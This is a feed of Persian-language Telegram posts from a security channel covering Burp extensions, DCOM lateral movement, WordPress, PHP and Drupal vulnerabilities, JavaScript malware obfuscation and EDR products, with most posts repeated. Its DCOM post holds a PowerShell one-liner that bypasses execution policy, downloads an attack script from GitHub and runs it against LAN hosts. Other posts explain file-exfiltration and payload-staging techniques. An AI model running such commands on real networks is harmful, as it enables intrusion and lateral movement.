#Top 10 #Extentions #BurpTools
شاید برای شما هم این سوال مطرح باشه که پلاگین های مفید و کارآمد ابزار #BurpSuite کدام ها میتونه باشه و ویژگی های اونها چیه؟ همونطور که در تصویر میبینید، برخی از آنها رو که مفید هستند رو برای شما معرفی کرده و نکاتی در خصوص ویژگی اونها خواهیم گفت:
.NET Beautifier
ابزاری برای مناسب نشان دادن کدهای .NET
Active Scan++
ابزاری برای اسکن اتوماتیک برخی CVE های معروف
CO2
ابزاری برای خودکارسازی پارامترهای SQLMap
Content-Type Convertor
ابزاری برای تبدیل فرمت داده های Json و XML
Logger++
ابزاری برای خروجی گرفتن لاگ های داده های ارسالی و دریافتی
JSON Web Token
ابزاری برای انواع حملات به JWT مانند None Key
Param Miner
ابزاری برای تست آسیب پذیری مسمومیت حافظه پنهان
PHP Object Injection Check
ابزاری برای تست پارامترهای Serialize برای آسیب پذیری PHPOi
Uploader Scanner
ابزاری در خصوص فازینگ Extentions های فیلدهای آپلود فایل
Turbo Intruder
ابزاری در خصوص حملات بروت فورس با امکان دور زدن مکانیزم های Recaptcha
موارد دیگر رو به خودتون میسپارم.
https://portswigger.net/bappstore
@Unk9vvN
شاید برای شما هم این سوال مطرح باشه که پلاگین های مفید و کارآمد ابزار #BurpSuite کدام ها میتونه باشه و ویژگی های اونها چیه؟ همونطور که در تصویر میبینید، برخی از آنها رو که مفید هستند رو برای شما معرفی کرده و نکاتی در خصوص ویژگی اونها خواهیم گفت:
.NET Beautifier
ابزاری برای مناسب نشان دادن کدهای .NET
Active Scan++
ابزاری برای اسکن اتوماتیک برخی CVE های معروف
CO2
ابزاری برای خودکارسازی پارامترهای SQLMap
Content-Type Convertor
ابزاری برای تبدیل فرمت داده های Json و XML
Logger++
ابزاری برای خروجی گرفتن لاگ های داده های ارسالی و دریافتی
JSON Web Token
ابزاری برای انواع حملات به JWT مانند None Key
Param Miner
ابزاری برای تست آسیب پذیری مسمومیت حافظه پنهان
PHP Object Injection Check
ابزاری برای تست پارامترهای Serialize برای آسیب پذیری PHPOi
Uploader Scanner
ابزاری در خصوص فازینگ Extentions های فیلدهای آپلود فایل
Turbo Intruder
ابزاری در خصوص حملات بروت فورس با امکان دور زدن مکانیزم های Recaptcha
موارد دیگر رو به خودتون میسپارم.
https://portswigger.net/bappstore
@Unk9vvN
#DCOM #Lateral_Movement
استفاده از #DCOM Object های مختلف که در سیستم عامل های ویندوز میتواند تعریف و بکار گرفته شود و امکان خوبی برای دور زدن مکانیزم های دفاعی بدهد، چرا که هر کدام از این #DCOM ها میتوانند بستر غیر مستقیمی برای داده هایی باشند که برای آنها ساخته شده اند, برای مثال ExcelDDE که در خصوص #DDE که در فایل فرمت Excel میتواند بکار گرفته شود,
# Open cmd (Administrator)
C:\Users\unk9vvn>
@Unk9vvN
استفاده از #DCOM Object های مختلف که در سیستم عامل های ویندوز میتواند تعریف و بکار گرفته شود و امکان خوبی برای دور زدن مکانیزم های دفاعی بدهد، چرا که هر کدام از این #DCOM ها میتوانند بستر غیر مستقیمی برای داده هایی باشند که برای آنها ساخته شده اند, برای مثال ExcelDDE که در خصوص #DDE که در فایل فرمت Excel میتواند بکار گرفته شود,
# Open cmd (Administrator)
C:\Users\unk9vvn>
%comspec% /K powershell.exe -ExecutionPolicy Bypass -NoExit -Command "$LAN = Get-NetIPAddress | Where-Object -FilterScript { $_.ValidLifetime -Lt ([TimeSpan]::FromDays(1)) } | Select-Object -Property IPAddress; Invoke-WebRequest -Uri https://raw.githubusercontent.com/rvrsh3ll/Misc-Powershell-Scripts/master/Invoke-DCOM.ps1 -OutFile %temp%\Invoke-DCOM.ps1; cd %temp%; Import-Module .\Invoke-DCOM.ps1; Invoke-DCOM -ComputerName $LAN.IPAddress -Method MMC20.Application -Command 'calc.exe'; Remove-Item %temp%\Invoke-DCOM.ps1; exit"
https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Invoke-DCOM.ps1@Unk9vvN
#OffensiveCON
یکی از دلایل عقب ماندگی علوم امنیت تهاجمی در ایران اینه که نگاه درستی چه در شرکت های فعال در حوزه خدمات دهی سایبری چه در دانشگاه ها و حتی میان خود محققین در این خصوص وجود نداره,
این علوم بصورت تک روی یا محدود کردن آن نمیتواند به حوزه نوآوری برسد, بلکه میبایست همانند کشورهای پیشتاز لیگ برتری از محققین را شرکت ها و خود محققین بوجود آورند تا بصورت جمعی و بر اساس کنش های علمی محصولات تحقیقاتی را به اشتراک گذاشته و جامعه علمی را به حرکت در آورند,
هستند کسانی که استراتژی های درست تحقیقاتی این علوم را میدانند اما بدلیل انحصار طلبی برای منابع خود علاقه ای به حرکت به این سو را ندارند, و ضربه آن را جوانان علاقمند و امنیت فضای اطلاعاتی کشور خواهند خورد,
البته آینده قرار نیست به این صورت باشد و علوم نوین آینده مانند هوش مصنوعی و غیره عجین شده با امنیت است و نگاه به امنیت هوشمندانه تر خواهد شد...
نمونه ای از این استراتژی در کشور آلمان با اسپانسری دو شرکت فعال ...
https://www.offensivecon.org/agenda/2019/
@Unk9vvN
یکی از دلایل عقب ماندگی علوم امنیت تهاجمی در ایران اینه که نگاه درستی چه در شرکت های فعال در حوزه خدمات دهی سایبری چه در دانشگاه ها و حتی میان خود محققین در این خصوص وجود نداره,
این علوم بصورت تک روی یا محدود کردن آن نمیتواند به حوزه نوآوری برسد, بلکه میبایست همانند کشورهای پیشتاز لیگ برتری از محققین را شرکت ها و خود محققین بوجود آورند تا بصورت جمعی و بر اساس کنش های علمی محصولات تحقیقاتی را به اشتراک گذاشته و جامعه علمی را به حرکت در آورند,
هستند کسانی که استراتژی های درست تحقیقاتی این علوم را میدانند اما بدلیل انحصار طلبی برای منابع خود علاقه ای به حرکت به این سو را ندارند, و ضربه آن را جوانان علاقمند و امنیت فضای اطلاعاتی کشور خواهند خورد,
البته آینده قرار نیست به این صورت باشد و علوم نوین آینده مانند هوش مصنوعی و غیره عجین شده با امنیت است و نگاه به امنیت هوشمندانه تر خواهد شد...
نمونه ای از این استراتژی در کشور آلمان با اسپانسری دو شرکت فعال ...
https://www.offensivecon.org/agenda/2019/
@Unk9vvN
#Defensive #Matrix
شاید تا به حال در خصوص Matrix تکنیکال مربوط به #RedTeam و #PurpleTeam رو دیده باشید اما Matrix تیم های #BlueTeam و مکانیزم ها و محصولات آنها چطور؟ در تصویر پست تمامی مکانیزم های شناسایی کننده و دفاعی رو در موقعیت مربوط به خود میبینید,
تیم های قرمز ماهیت کار کرد خود را در ایجاد روشهای جدید برای دور زدن این مکانیزم ها میبینند, و همواره نیازهای جدید تیم های آبی به حالا هم محصولات و سیاست های تدافعی تایین میکنند, چرخه ای که هر دو مکمل هم هستند و هر دو از فضاهای تکنیکالی یکدیگر اشراف کامل دارند, فقط ماهیت فعالیت آنها یک در دور زدن یکی در رهگیری کردن به واسطه هوش مصنوعی تعریف میشود,
نگاه غلطی که همواره در ایران دیده میشود این است که کسانی که بصورت #BlueTeam فعالیت دارند صرفاء میبایست با محصولات Analyser و تحلیل ترافیک و غیره سروکار داشته باشند, این در حالیست که بسیاری از این محصولات و محققین تولید کننده آنها در بالاترین سطوح تکنیکالی تیم قرمز قرار دارند و به همین واسطه تولید محصول کرده و به کشورهایی مانند ایران میفروشند, محصولات #MDR از این دست موارد هستند..
MDR
@Unk9vvN
شاید تا به حال در خصوص Matrix تکنیکال مربوط به #RedTeam و #PurpleTeam رو دیده باشید اما Matrix تیم های #BlueTeam و مکانیزم ها و محصولات آنها چطور؟ در تصویر پست تمامی مکانیزم های شناسایی کننده و دفاعی رو در موقعیت مربوط به خود میبینید,
تیم های قرمز ماهیت کار کرد خود را در ایجاد روشهای جدید برای دور زدن این مکانیزم ها میبینند, و همواره نیازهای جدید تیم های آبی به حالا هم محصولات و سیاست های تدافعی تایین میکنند, چرخه ای که هر دو مکمل هم هستند و هر دو از فضاهای تکنیکالی یکدیگر اشراف کامل دارند, فقط ماهیت فعالیت آنها یک در دور زدن یکی در رهگیری کردن به واسطه هوش مصنوعی تعریف میشود,
نگاه غلطی که همواره در ایران دیده میشود این است که کسانی که بصورت #BlueTeam فعالیت دارند صرفاء میبایست با محصولات Analyser و تحلیل ترافیک و غیره سروکار داشته باشند, این در حالیست که بسیاری از این محصولات و محققین تولید کننده آنها در بالاترین سطوح تکنیکالی تیم قرمز قرار دارند و به همین واسطه تولید محصول کرده و به کشورهایی مانند ایران میفروشند, محصولات #MDR از این دست موارد هستند..
MDR
@Unk9vvN
#Art of #Fuzzing
بحث Fuzzer ها بحثی همواره جذاب و شیرین بوده است, به گونه ای که هرساله در کنفرانس های جهانی به این موضوع پرداخته و سعی بر ادغام کردن علوم هوش مصنوعی با این موضوع رو دارا هستند,
اما بحث طراحی Fuzzer از پیچیدگی های خاص خود برخوردار است ,چرا که فضاها و کامپایلرهایی که Fuzzer ها میبایست برای آنها Input Generation انجام دهند همواره متفاوت و بعضا عملکری بخصوص داشته اند, این موضوع در خصوص کامپایلرهای در لحظه یا Just In Time دیده شده و البته راهکارهای متداول خود را داشته و طرح ایده شده است,
برای عزیزان علاقمندی که میخواهند در این حوزه جدیدترین مقالات روز دنیارا مطالعه کنند, میتوانند به Page Paper زیر مراجعه نموده و طبق فضا و پلتفرم مورد نظر خودتون جدیدترین مقالات را مشاهده نمایند...
https://wcventure.github.io/FuzzingPaper/
@Unk9vvN
بحث Fuzzer ها بحثی همواره جذاب و شیرین بوده است, به گونه ای که هرساله در کنفرانس های جهانی به این موضوع پرداخته و سعی بر ادغام کردن علوم هوش مصنوعی با این موضوع رو دارا هستند,
اما بحث طراحی Fuzzer از پیچیدگی های خاص خود برخوردار است ,چرا که فضاها و کامپایلرهایی که Fuzzer ها میبایست برای آنها Input Generation انجام دهند همواره متفاوت و بعضا عملکری بخصوص داشته اند, این موضوع در خصوص کامپایلرهای در لحظه یا Just In Time دیده شده و البته راهکارهای متداول خود را داشته و طرح ایده شده است,
برای عزیزان علاقمندی که میخواهند در این حوزه جدیدترین مقالات روز دنیارا مطالعه کنند, میتوانند به Page Paper زیر مراجعه نموده و طبق فضا و پلتفرم مورد نظر خودتون جدیدترین مقالات را مشاهده نمایند...
https://wcventure.github.io/FuzzingPaper/
@Unk9vvN
Media is too big
VIEW IN TELEGRAM
#Endpoint Detection in #Splunk Demo
نمایشی از چگونگی عملکرد ThreatHunting یکی از App های نرم افزار #Splunk هستش که چطور Process Injection پایلودهای فریمورک Cobalt Strike رو شناسایی میکنه و از بین میبره,
البته وبلاگ CobaltStrike هم اعلام کرده که دیگه از تکنیک RemoteThreads استفاده نمیکنه برای Process Injection و بجای آن از WriteProcessMemory استفاده خواهد کرد که چند و چون ماجرا را میتوانید در وبلاگ زیر مطالعه بفرمایید...
https://blog.cobaltstrike.com/2019/08/21/cobalt-strikes-process-injection-the-details/
https://splunkbase.splunk.com/app/4305/
@Unk9vvN
نمایشی از چگونگی عملکرد ThreatHunting یکی از App های نرم افزار #Splunk هستش که چطور Process Injection پایلودهای فریمورک Cobalt Strike رو شناسایی میکنه و از بین میبره,
البته وبلاگ CobaltStrike هم اعلام کرده که دیگه از تکنیک RemoteThreads استفاده نمیکنه برای Process Injection و بجای آن از WriteProcessMemory استفاده خواهد کرد که چند و چون ماجرا را میتوانید در وبلاگ زیر مطالعه بفرمایید...
https://blog.cobaltstrike.com/2019/08/21/cobalt-strikes-process-injection-the-details/
https://splunkbase.splunk.com/app/4305/
@Unk9vvN
This media is not supported in your browser
VIEW IN TELEGRAM
#Arbitrary_File_Read in Contact Form 7
ماجرا از آنجایی شروع میشود که پلاگین ها برای ایجاد یک پست نیازمند استفاده از تابعی از API هسته Wordpress خواهند شد,این تابع که ()register_post_type نام دارد دارای آسیب پذیری در قسمت تصدیق سطح دسترسی برای کاربران سطح پایین در خصوص ایجاد یک پست است,
هر درخواست برای ایجاد یک Post جدید میبایست دارای post_type$ تایید شده برای ایجاد باشد که این post_type$ در سطح ادمین ساخته میشود,نکته و آسیب پذیری آنجایست که اگر پارامتر GET['post']_$ به صفحه wp-admin/post.php/ به همراه ساختمان ایجاد Contact Form ارسال شود بدون آنکه مقدار آن چک شود تابع ()wp_insert_post اقدام به ایجاد یک Contact Form با data هکر خواهد کرد,
همانطور که میدانید این پلاگین ماهیت ایجاد Contact را بشما میدهد, آسیب پذیری دقیقا همین قایلیت است,هکر با استفاده از قابلیت attachment اقدام به attach کردن فایل های حساس CMS مانند wp-config.php/.. میکند ,Validate نکردن آدرس های فایل attach شده, موجب میشود تا هکر فایل حساسی را attach کرده و به Mail تنظیم کرده خود ارسال کند!
Blog
@Unk9vvN
ماجرا از آنجایی شروع میشود که پلاگین ها برای ایجاد یک پست نیازمند استفاده از تابعی از API هسته Wordpress خواهند شد,این تابع که ()register_post_type نام دارد دارای آسیب پذیری در قسمت تصدیق سطح دسترسی برای کاربران سطح پایین در خصوص ایجاد یک پست است,
هر درخواست برای ایجاد یک Post جدید میبایست دارای post_type$ تایید شده برای ایجاد باشد که این post_type$ در سطح ادمین ساخته میشود,نکته و آسیب پذیری آنجایست که اگر پارامتر GET['post']_$ به صفحه wp-admin/post.php/ به همراه ساختمان ایجاد Contact Form ارسال شود بدون آنکه مقدار آن چک شود تابع ()wp_insert_post اقدام به ایجاد یک Contact Form با data هکر خواهد کرد,
همانطور که میدانید این پلاگین ماهیت ایجاد Contact را بشما میدهد, آسیب پذیری دقیقا همین قایلیت است,هکر با استفاده از قابلیت attachment اقدام به attach کردن فایل های حساس CMS مانند wp-config.php/.. میکند ,Validate نکردن آدرس های فایل attach شده, موجب میشود تا هکر فایل حساسی را attach کرده و به Mail تنظیم کرده خود ارسال کند!
Blog
@Unk9vvN
This media is not supported in your browser
VIEW IN TELEGRAM
#ProcDump for Linux
ابزار محبوب ProcDump برای سیستم عامل های لینوکس هم طراحی شده است,
ماکروسافت ابزاری را طراحی کرده که میتوان با آن مانند #ProcDump در سیستم عامل ویندوز در لینوکس هم عمل کرد و داده های مپ شده بر روی حافظه رو Dump نمود,
# Ubuntu
unk9vvn@avi:~$
# Kali Linux
unk9vvn@avi:~$
https://github.com/microsoft/ProcDump-for-Linux
@Unk9vvN
ابزار محبوب ProcDump برای سیستم عامل های لینوکس هم طراحی شده است,
ماکروسافت ابزاری را طراحی کرده که میتوان با آن مانند #ProcDump در سیستم عامل ویندوز در لینوکس هم عمل کرد و داده های مپ شده بر روی حافظه رو Dump نمود,
# Ubuntu
unk9vvn@avi:~$
wget -q https://packages.microsoft.com/config/ubuntu/$(lsb_release -rs)/packages-microsoft-prod.deb -O packages-microsoft-prod.deb;sudo dpkg -i packages-microsoft-prod.deb;sudo apt-get update;sudo apt-get install procdump# Kali Linux
unk9vvn@avi:~$
sudo apt-get install -y procdumphttps://github.com/microsoft/ProcDump-for-Linux
@Unk9vvN
Media is too big
VIEW IN TELEGRAM
#DbgShell Hackathon PoC
ماکروسافت یک دیباگر بر مبنای زبان پاورشل داره که بسیار در عرصه مهندسی معکوس بدافزارها میتونه مفید باشه چرا که بسیاری از دیباگرها برای بدافزارها شناسایی شده و مکانیزم های آنتی دیباگ بر علیه آنها نوشته میشود,
اما اگر از دیباگرهای کمتر شناخته شده استفاده بشه میتونه درصد موفقیت رو بالا ببره, همچنین این دیباگر میتونه موتورهای اجرایی زبان های جاوا اسکریپت بر روی مرورگرهارو هم دیباگ کنه که در عرصه کشف آسیب پذیری برای مرورگرها میتونه مفید باشه, همچنین تعامل این دیباگر با دیباگر ویندوز هم یکی دیگه از گزینه های مثبت اون حساب میشود, برای دیدن عملکرد این دیباگر پشنهاد میکند PoC Video رو مشاهده بفرمایید,
https://github.com/microsoft/DbgShell
@Unk9vvN
ماکروسافت یک دیباگر بر مبنای زبان پاورشل داره که بسیار در عرصه مهندسی معکوس بدافزارها میتونه مفید باشه چرا که بسیاری از دیباگرها برای بدافزارها شناسایی شده و مکانیزم های آنتی دیباگ بر علیه آنها نوشته میشود,
اما اگر از دیباگرهای کمتر شناخته شده استفاده بشه میتونه درصد موفقیت رو بالا ببره, همچنین این دیباگر میتونه موتورهای اجرایی زبان های جاوا اسکریپت بر روی مرورگرهارو هم دیباگ کنه که در عرصه کشف آسیب پذیری برای مرورگرها میتونه مفید باشه, همچنین تعامل این دیباگر با دیباگر ویندوز هم یکی دیگه از گزینه های مثبت اون حساب میشود, برای دیدن عملکرد این دیباگر پشنهاد میکند PoC Video رو مشاهده بفرمایید,
https://github.com/microsoft/DbgShell
@Unk9vvN
Media is too big
VIEW IN TELEGRAM
#HX #Exploit #Detection for #Endpoints
در سال ۲۰۱۶ شرکت #FireEye از محصولی با نام Helix Security که علاوه بر EndPoint Detection بودنش یک ویژگی منحصر به فردی دیگری هم داشت که در این دمو در آن خصوص توضیحاتی را بیان میکند,
اگر بطور خلاصه بخواهیم به آن بپردازیم, میتوان اینطور شرح داد که این شرکت نه تنها بر Stage های طراحی شده در زبان های سطح بالا بر روی فایل فرمت های Portable Execution بلکه بر روی Shellcode هایی که بر بستر یک Vulnerability میتونه به قربانی ارسال بشه هم رهگیری خواهد شد, یعنی اگر یک هکر بر روی مثلا یک پروتکل یک آسیب پذیری 0day کشف کرده باشه و یک Gadget در خصوص دور زدن مکانیزم های Mitigation در مقابل آسیب پذیری رو بخواد پیاده کنه از همین تکنیک ها میتوان او را ردیابی کرد,
پس با این شرایط بظر میاد یک چالشی دیگر در خصوص پایلود کردن یک آسیب پذیری به تمامی چالش های این موضوع هم اضافه خواهد شد, نظریه اولیه در خصوص دور زدن این Exploit Guard میتونه این باشه که روش هایی که برای دور زدن Mitigation ها استفاده میشه هم میبایست Publish نباشه و ...
Helix
@Unk9vvN
در سال ۲۰۱۶ شرکت #FireEye از محصولی با نام Helix Security که علاوه بر EndPoint Detection بودنش یک ویژگی منحصر به فردی دیگری هم داشت که در این دمو در آن خصوص توضیحاتی را بیان میکند,
اگر بطور خلاصه بخواهیم به آن بپردازیم, میتوان اینطور شرح داد که این شرکت نه تنها بر Stage های طراحی شده در زبان های سطح بالا بر روی فایل فرمت های Portable Execution بلکه بر روی Shellcode هایی که بر بستر یک Vulnerability میتونه به قربانی ارسال بشه هم رهگیری خواهد شد, یعنی اگر یک هکر بر روی مثلا یک پروتکل یک آسیب پذیری 0day کشف کرده باشه و یک Gadget در خصوص دور زدن مکانیزم های Mitigation در مقابل آسیب پذیری رو بخواد پیاده کنه از همین تکنیک ها میتوان او را ردیابی کرد,
پس با این شرایط بظر میاد یک چالشی دیگر در خصوص پایلود کردن یک آسیب پذیری به تمامی چالش های این موضوع هم اضافه خواهد شد, نظریه اولیه در خصوص دور زدن این Exploit Guard میتونه این باشه که روش هایی که برای دور زدن Mitigation ها استفاده میشه هم میبایست Publish نباشه و ...
Helix
@Unk9vvN
#Detection Categories Leadership
در سال ۲۰۱۹ یک Emulation از حمله APT29 روسیه ترسیم شد برای رتبه بندی Endpoint Security های بنام دنیا, که این ارزیابی دارای ۵ بخش بود که من به ترتیب اسم برده و Summary میکنم,
Telemetry
نحوه عملکرد دیوایس ها بر روی دستوراتی که اجرا و لاگ شده است...
MSSP
بررسی مکانیزم Managed Security Service Provider که در نحوه مانیتورینگ و آنالیز چقدر احاطه بر فضاها دارا است و با چه کیفیتی دیتا از آنالیز خود در اختیار نمایش میدهد
General
بررسی همواره پروسه ها برای رهگیری رفتار های مشکوک و مخرب,
Tactic
بررسی احاطه محصول در خصوص تکنیک های ارائه شده از سوی ATT&CK که مستند و عمومی شده است
Technique
رهگیری تکنیک هایی که مامور جمع آوری اطلاعات حساس هستند با استفاده از تکنیک های نوین که #EDR ها میبایست به دقت تشخیص دهند,
اما در تمامی این پلن ها همونطور که میبینید #FireEye جایگاه نخستین را دارد, این در حالیست که شرکت های ایرانی آنقدر از فضای روز دنیا عقب هستند که هنوز جایگاه تیم های قرمز و آبی رو هم درک نکرده اند, شرکت های ایرانی ۱۰ سال از دنیا عقب هستند معمولا...
Results
@Unk9vvN
در سال ۲۰۱۹ یک Emulation از حمله APT29 روسیه ترسیم شد برای رتبه بندی Endpoint Security های بنام دنیا, که این ارزیابی دارای ۵ بخش بود که من به ترتیب اسم برده و Summary میکنم,
Telemetry
نحوه عملکرد دیوایس ها بر روی دستوراتی که اجرا و لاگ شده است...
MSSP
بررسی مکانیزم Managed Security Service Provider که در نحوه مانیتورینگ و آنالیز چقدر احاطه بر فضاها دارا است و با چه کیفیتی دیتا از آنالیز خود در اختیار نمایش میدهد
General
بررسی همواره پروسه ها برای رهگیری رفتار های مشکوک و مخرب,
Tactic
بررسی احاطه محصول در خصوص تکنیک های ارائه شده از سوی ATT&CK که مستند و عمومی شده است
Technique
رهگیری تکنیک هایی که مامور جمع آوری اطلاعات حساس هستند با استفاده از تکنیک های نوین که #EDR ها میبایست به دقت تشخیص دهند,
اما در تمامی این پلن ها همونطور که میبینید #FireEye جایگاه نخستین را دارد, این در حالیست که شرکت های ایرانی آنقدر از فضای روز دنیا عقب هستند که هنوز جایگاه تیم های قرمز و آبی رو هم درک نکرده اند, شرکت های ایرانی ۱۰ سال از دنیا عقب هستند معمولا...
Results
@Unk9vvN
#Type_Juggling & #Object_Reference on #PHP_Object_Injection
جالب است بدانید که در خصوص پایلود ریزی مثلا مقادیر Serialize شده پارامتر کوکی هم میتوان در خصوص دور زدن مکانیزم احراز هویت اقدام به اکسپلویت کردن آسیب پذیری هایی مانند Type_Juggling کرد,
به کد آسیب پذیری سمت چپ بالا دقت کنید, بصورت واضح دیده میشه که کوکی تنظیم شده بر روی auth در پارامتر Cookie قراره که در تابع ()unserialize ترجمه و در شرط زیرین پارامترهای username و password رو با مقادیر متغیرات مقابل را مقایسه و در صورت صحیح بودن متغیر admin$ رو معادل True قرار میدهد
خب اولین نکته اینجاست که compare استفاده شده از نوع loose هست که به معنی در نظر نگرفتن نوع داده های مقایسه هست که همین موضوع موجب آسیب پذیری است
در تصویر پست سمت چپ پایین میبینید که یک آرایه تعریف شده با دو value که b:1 هستند به معنیه Boolean True که همین Value که یک Data Type محسوب میشه موجب مقایسه True == String میشه و نتیجه آنکه خروجی Condition میشود True و به این صورت متغیر admin$ برابر True خواهد بود
آسیب پذیری سمت راست رو هم به خودتون میسپارم...
@Unk9vvN
جالب است بدانید که در خصوص پایلود ریزی مثلا مقادیر Serialize شده پارامتر کوکی هم میتوان در خصوص دور زدن مکانیزم احراز هویت اقدام به اکسپلویت کردن آسیب پذیری هایی مانند Type_Juggling کرد,
به کد آسیب پذیری سمت چپ بالا دقت کنید, بصورت واضح دیده میشه که کوکی تنظیم شده بر روی auth در پارامتر Cookie قراره که در تابع ()unserialize ترجمه و در شرط زیرین پارامترهای username و password رو با مقادیر متغیرات مقابل را مقایسه و در صورت صحیح بودن متغیر admin$ رو معادل True قرار میدهد
خب اولین نکته اینجاست که compare استفاده شده از نوع loose هست که به معنی در نظر نگرفتن نوع داده های مقایسه هست که همین موضوع موجب آسیب پذیری است
در تصویر پست سمت چپ پایین میبینید که یک آرایه تعریف شده با دو value که b:1 هستند به معنیه Boolean True که همین Value که یک Data Type محسوب میشه موجب مقایسه True == String میشه و نتیجه آنکه خروجی Condition میشود True و به این صورت متغیر admin$ برابر True خواهد بود
آسیب پذیری سمت راست رو هم به خودتون میسپارم...
@Unk9vvN
This media is not supported in your browser
VIEW IN TELEGRAM
#Enumerating Vulnerable #DCOM Applications #DCOMrade
با استفاده از DCOMrade شما میتونید از راه دور به دیوایس ویندوزی خود وصل شده و یک سرشماری بر روی AppID ها انجام داده تا CLSID هایی که پرمیژن LaunchPermission باز دارند رو پیدا کنید, تا از آن که البته بصورت پیشفرض وجود داره و این موضوع دو امکان رو به هکر میتونه بده,
یک اینکه شما میتونید برای Lateral Movement انجام دادن استفاده کنید که میتونه باعث دور زدن رفتار شناسی پایلودها به وسیله #EDR ها و غیره است, دوم اینکه میتوان با استفاده از این پرمیژن مکانیزم هایی مانند #UAC و برای #Privilege_Escalation انجام داد, حتی در مواقعی میتوان از این Security Misconfiguration در سرورهای آسیب پذیر میتوان برای Pivot زدن در شبکه هم استفاده کرد,روش استخراج اطلاعات
unk9vvn@avi:~$
https://github.com/sud0woodo/DCOMrade
@Unk9vvN
با استفاده از DCOMrade شما میتونید از راه دور به دیوایس ویندوزی خود وصل شده و یک سرشماری بر روی AppID ها انجام داده تا CLSID هایی که پرمیژن LaunchPermission باز دارند رو پیدا کنید, تا از آن که البته بصورت پیشفرض وجود داره و این موضوع دو امکان رو به هکر میتونه بده,
یک اینکه شما میتونید برای Lateral Movement انجام دادن استفاده کنید که میتونه باعث دور زدن رفتار شناسی پایلودها به وسیله #EDR ها و غیره است, دوم اینکه میتوان با استفاده از این پرمیژن مکانیزم هایی مانند #UAC و برای #Privilege_Escalation انجام داد, حتی در مواقعی میتوان از این Security Misconfiguration در سرورهای آسیب پذیر میتوان برای Pivot زدن در شبکه هم استفاده کرد,روش استخراج اطلاعات
unk9vvn@avi:~$
pwsh
PS /home/unk9vvn> $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39', "192.168.99.13")
PS /home/unk9vvn> $obj = [System.Activator]::CreateInstance($com)
PS /home/unk9vvn> $item = $obj.Item()
PS /home/unk9vvn> $item
... ...https://github.com/sud0woodo/DCOMrade
@Unk9vvN
#Drupal_XSS_RCE
آسیب پذیری که در CMS محبوب Drupal در سال ۲۰۱۹ عمومی شد بر بستر یکی از روش های تست آسیب پذیری #Uploader ها هستش, همونطور که در تصویر پست مشاهده میکنید هکر بر بستر
اما نکته ای که در این اکسپلویت وجود داره نام فایل هم هست اگر به نام فایل دقت کنید
https://github.com/thezdi/PoC/tree/master/Drupal
https://www.zerodayinitiative.com/advisories/ZDI-19-291/
@Unk9vvN
آسیب پذیری که در CMS محبوب Drupal در سال ۲۰۱۹ عمومی شد بر بستر یکی از روش های تست آسیب پذیری #Uploader ها هستش, همونطور که در تصویر پست مشاهده میکنید هکر بر بستر
Content-Type از نوع فایل تصویری image/gif پیلود ریزی شده که بعد از آپلود اگر توسط شخصی یا مکانیزمی load بخواد بشه فایل مربوطه که درونش با signature فایل فرمت GIF آغاز شده مانند یک صفحه html باز خواهد شد و کد جاوا اسکریپتی هکر به اجرا در خواهد آمد,اما نکته ای که در این اکسپلویت وجود داره نام فایل هم هست اگر به نام فایل دقت کنید
xxx\xc0.gif هستش که در اینجا یک مقدار hexadecimal هستش که معادلxc0 -> �
قرار داره یعنی در نام فایل هم یک NullByte استفاده شده برای تفسیر نشدن فایل فرمت به یک GIF پس در نتیجه Loader مربوطه محتوای فایل رو در وبسرور میتونه به اجرا در بیاره...https://github.com/thezdi/PoC/tree/master/Drupal
https://www.zerodayinitiative.com/advisories/ZDI-19-291/
@Unk9vvN
#Javascript #Malware #Obfuscation
در بسیاری از حملات #APTs استفاده از Stage های مبهم شده بر بستر زبان هایی مانند Javascript بسیار میتونه در امر Evasion شدن پیلود مفید باشه,
در پیلود تصویر میبینید که چهار دامنه تعریف شده در متغیر x که یک حلقه for کام آبجکت WScript مامور ساخت یک آبجکت از روی MSXML2 میشه برای زدن Requset هایی به وبسایت های تعریف شده و دریافت Response از آنها و بعد از آماده سازی Response مقدار با مقدار متغیر m و نهایتا در تابع ()eval کد دریافتی اجرا شده و مرحله بعد Leteral Movement شرو ع خواهد شد,
دقت بفرمایید که حساسیت استفاده از COM Object ها در فرمت هایی مانند JS بسیار بالاست و این قبیل فرمت ها تحت نظر و برسی خواهند بود اما زمانی که بصورت مبهم سازی شده COM Object ساخته و عملیات مد نظر رو initialize کرده و جالب اینجاست که Stage اصلی از Response دریافت خواهد شد, این نکته بسیار در امر Evasion شدن پیلود موءثر بوده است...
https://medium.com/nodesimplified/obfuscation-what-is-obfuscation-in-javascript-why-obfuscation-is-used-f6a5f5bcf022
@Unk9vvN
در بسیاری از حملات #APTs استفاده از Stage های مبهم شده بر بستر زبان هایی مانند Javascript بسیار میتونه در امر Evasion شدن پیلود مفید باشه,
در پیلود تصویر میبینید که چهار دامنه تعریف شده در متغیر x که یک حلقه for کام آبجکت WScript مامور ساخت یک آبجکت از روی MSXML2 میشه برای زدن Requset هایی به وبسایت های تعریف شده و دریافت Response از آنها و بعد از آماده سازی Response مقدار با مقدار متغیر m و نهایتا در تابع ()eval کد دریافتی اجرا شده و مرحله بعد Leteral Movement شرو ع خواهد شد,
دقت بفرمایید که حساسیت استفاده از COM Object ها در فرمت هایی مانند JS بسیار بالاست و این قبیل فرمت ها تحت نظر و برسی خواهند بود اما زمانی که بصورت مبهم سازی شده COM Object ساخته و عملیات مد نظر رو initialize کرده و جالب اینجاست که Stage اصلی از Response دریافت خواهد شد, این نکته بسیار در امر Evasion شدن پیلود موءثر بوده است...
https://medium.com/nodesimplified/obfuscation-what-is-obfuscation-in-javascript-why-obfuscation-is-used-f6a5f5bcf022
@Unk9vvN
#JavaScript #Types #Map
یکی از فضاهای بسیار جذاب برای هکرهای بلکهت در خصوص حمله به اهداف خود استفاده از آسیب پذیری های مرورگرها است, که البته در این خصوص قبلا صحبت کردیم,
اما نکته ای که در این پست میتونه براتون مفید باشه اینه که برای طراحی اکسپلویت در خصوص Engine های تفسیری مرورگرها خصوصا Engine مفسر زبان JavaScript, میبایست محققین این امر نگاه دقیقی به Syntax زبان JavaScript داشته و اطلاعات کاملی را از نحوه عملکرد Type های مختلف این زبان داشته باشد,
از این روی یک نقشه کامل از Type ها Method ها و دیگر مباحث مهم در این زبان را برای شما به اشتراک گزاشته خواهد شد تا در ادراک سازوکار های Type های مختلف بر روی حافظه های مختلف در سطح زیرین پیدا کرده و از روی با تسلط بیشتری وارد این دنیای جذاب شد,
برای استفاده از تصویر نقشه بر روی آن زوم بفرمایید...
https://ibb.co/1b1CKb9
@Unk9vvN
